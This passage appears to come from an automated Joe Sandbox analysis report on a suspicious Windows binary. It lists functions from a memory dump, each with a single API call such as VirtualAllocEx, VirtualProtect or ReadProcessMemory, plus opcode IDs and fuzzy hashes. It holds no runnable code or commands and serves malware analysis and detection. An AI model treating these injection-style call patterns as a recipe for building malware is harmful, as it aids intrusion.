                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8432b38c690260ad73e7fe7cdb81815dfa2d89b958cb99d4fd2b8c935008bd26
                                                                • Instruction ID: 675ef3cd2013f9c44bc97c5cec69d62f0dd0f95f2be87cb63023ca5698766a23
                                                                • Opcode Fuzzy Hash: 8432b38c690260ad73e7fe7cdb81815dfa2d89b958cb99d4fd2b8c935008bd26
                                                                • Instruction Fuzzy Hash: 26B14DB1D00208AFDF00EFA5C8C6BEE7BB4EB08314F50406AF505B6291E77A5E519B79
                                                                Function 004C8D69 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00001000,00000040,?,?,?,?,?,004C8ADA,00000000), ref: 004C8DBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 5321aadd03b4ff78bf87896a842166763a14602d555da917c8a2ebc2c63137a6
                                                                • Instruction ID: dd16b350c8c55309d0d2a4603b058fc0e2ad63f3eecb3caa54ef0ce129237d98
                                                                • Opcode Fuzzy Hash: 5321aadd03b4ff78bf87896a842166763a14602d555da917c8a2ebc2c63137a6
                                                                • Instruction Fuzzy Hash: 52016774E40308FBEB50AF91CC46FADBB70EB04705F108059FA047E2D1D67A5A609F89
                                                                Function 004A418E Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 004A41EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: fb404a7be434b38586d50e3682ebd8736a5d6832af9ddd3396040e0f4298746c
                                                                • Instruction ID: 1fa6d6f9f2caa90c4173e54f779f6949a5d5ea07f330ef5204728c791f2174f2
                                                                • Opcode Fuzzy Hash: fb404a7be434b38586d50e3682ebd8736a5d6832af9ddd3396040e0f4298746c
                                                                • Instruction Fuzzy Hash: 33012C76C0020CEBDF109F90D909B9EBBB4EB51315F00806AF9146A280D3B98B64DF95
                                                                Function 004560EE Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00456116
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 1653199695-0
                                                                • Opcode ID: 68d7b51abcb88482ced3597df9320cb623684ecc113ab7292be451705457c5bb
                                                                • Instruction ID: 8687cb2ca3b80703b1d3f32da0f969eaa0c79a7cf78db1c88bd3005a0fd612b9
                                                                • Opcode Fuzzy Hash: 68d7b51abcb88482ced3597df9320cb623684ecc113ab7292be451705457c5bb
                                                                • Instruction Fuzzy Hash: 4DF01D75D0420CEBDB10DFA4D9057AEFB78AB01355F108166E814AB2C2D7798B18DB89
                                                                Function 004809EB Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: ec66ef47455b45cf9ab7b777ed90957b4d84bec4f2e42e8436d899fcd9851da7
                                                                • Instruction ID: 85ebc6002c90a229762f8ee1c2dc5b1c0c305469819d3ef9b180a6c082364497
                                                                • Opcode Fuzzy Hash: ec66ef47455b45cf9ab7b777ed90957b4d84bec4f2e42e8436d899fcd9851da7
                                                                • Instruction Fuzzy Hash: 62F01774D1420CFBEB54EF80D806BADBB74BB11710F109466A5146B280D27A9A98EB8A
                                                                Function 004A0622 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 004A0652
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 9d75f1a898ddacdbaeeb6dc034e50d59440f31f7ff18817266f9988c7b2de5f4
                                                                • Instruction ID: 002e4937401c46ab901ff166ee5e83c665022e3b3ffa476f939f3ae7b65d2c95
                                                                • Opcode Fuzzy Hash: 9d75f1a898ddacdbaeeb6dc034e50d59440f31f7ff18817266f9988c7b2de5f4
                                                                • Instruction Fuzzy Hash: C9F0F87194020CFBDF019F90DC46FAE7B35EB1A314F108165FA042A1A0D7768A35EB9A
                                                                Function 004562A0 Relevance: 1.5, APIs: 1, Instructions: 28threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004562C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 1653199695-0
                                                                • Opcode ID: cec13cbd7373f84ba33bab6a39f6c284c3370ecad1f45b2b4b15133a7338f778
                                                                • Instruction ID: a7b4e03387866221ebf57b103b6a0ff9189fdb8ee1850808b069291f5b987186
                                                                • Opcode Fuzzy Hash: cec13cbd7373f84ba33bab6a39f6c284c3370ecad1f45b2b4b15133a7338f778
                                                                • Instruction Fuzzy Hash: 2AF030B0D4020CFBDB00EF94D946BAEFB78AB11301F1080AAE904BB281D3755B54DF99
                                                                Function 0040E873 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsBadStringPtrA.KERNEL32(0040E69D,00000004), ref: 0040E887
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String
                                                                • String ID:
                                                                • API String ID: 2568140703-0
                                                                • Opcode ID: 883722d1c14e2c6e1ff6a9bfe61ba7b481f64e8f529928896bbdef5fc2fbc29e
                                                                • Instruction ID: 07323debd0214050571aa9a78ad8b29dd022128f6f7da5e25aa24f08b7018e76
                                                                • Opcode Fuzzy Hash: 883722d1c14e2c6e1ff6a9bfe61ba7b481f64e8f529928896bbdef5fc2fbc29e
                                                                • Instruction Fuzzy Hash: 68E04F71E45308BBD710AE52D907BADBB74DB02715F0094B6FA043B1D0D27A4A64AB9E
                                                                Function 004B4C9A Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000010,00000008,00000010), ref: 004B4CB1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 1e98cd105831d16150243bad0d9c1fd4ae9240906090ef51f94fca20d1a3a0b5
                                                                • Instruction ID: 8767b5bd0d349e60f5f66340f510312a137a6ea04e878a6fe03ee699eb95acc8
                                                                • Opcode Fuzzy Hash: 1e98cd105831d16150243bad0d9c1fd4ae9240906090ef51f94fca20d1a3a0b5
                                                                • Instruction Fuzzy Hash: 0EE08634D45208F7C7106E50AD07BBDBF34A706711F108016B9443A1D2D5765A34B79A
                                                                Function 0045606E Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 0045607D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Parent
                                                                • String ID:
                                                                • API String ID: 975332729-0
                                                                • Opcode ID: 2a1cdb3e204100450292f962ecd6b12c9455aedf8ac120fa4cd4161b75f6c1d2
                                                                • Instruction ID: eab09d2da63cc470e2d7c5da2bd86dbc444607c9cbfa236b36e2e1147a725add
                                                                • Opcode Fuzzy Hash: 2a1cdb3e204100450292f962ecd6b12c9455aedf8ac120fa4cd4161b75f6c1d2
                                                                • Instruction Fuzzy Hash: DAD0C230D05208B7C610AE40E907B2CBA349703B11F80802ABD043B1C2E6324A28A78A
                                                                Function 004560AE Relevance: 1.5, APIs: 1, Instructions: 21windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 004560BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: VisibleWindow
                                                                • String ID:
                                                                • API String ID: 1208467747-0
                                                                • Opcode ID: aa1ad4e3b3ca423c950da0449317cf466611b5f60e84eabdbcf0f45ab598fb2c
                                                                • Instruction ID: 256a5dd05f6a5fce77e8d515df2f1984ba230f0ae203550bb037fc93dfdd2f99
                                                                • Opcode Fuzzy Hash: aa1ad4e3b3ca423c950da0449317cf466611b5f60e84eabdbcf0f45ab598fb2c
                                                                • Instruction Fuzzy Hash: 30D0C230D05208B3C210AE50A907B2DBE349703711F80816ABC043B1C2D5328E29A69F
                                                                Function 00474D78 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00474D89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalLeaveSection
                                                                • String ID:
                                                                • API String ID: 3988221542-0
                                                                • Opcode ID: ec799e7d6f59a7575a8ce1524903297f39fc38e8c7389cfc726570fb2a9553f9
                                                                • Instruction ID: 07a8c152ee8b9b6a6d45b179f52d3f33ca3d78b153dd0b689c5a6fce856d6790
                                                                • Opcode Fuzzy Hash: ec799e7d6f59a7575a8ce1524903297f39fc38e8c7389cfc726570fb2a9553f9
                                                                • Instruction Fuzzy Hash: ADE0C270E00308A7CB20EE54DD47B68B734A706711F004066FA082B1C1E2715A248A9E
                                                                Function 0040C1F1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32(?,?,004014FF), ref: 0040C1FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID:
                                                                • API String ID: 2050909247-0
                                                                • Opcode ID: a3efc20a4f26b74a40b2921856050b7f360abaabd627c938a93083109454b905
                                                                • Instruction ID: a6c5faf60ee293af242c299a8563327bbc013f20570462a7b347525dec476b91
                                                                • Opcode Fuzzy Hash: a3efc20a4f26b74a40b2921856050b7f360abaabd627c938a93083109454b905
                                                                • Instruction Fuzzy Hash: 9DD05E31E45308F7C610AFD07A4377CB6389707701F9092EAA9093A1C1D5799A24968F
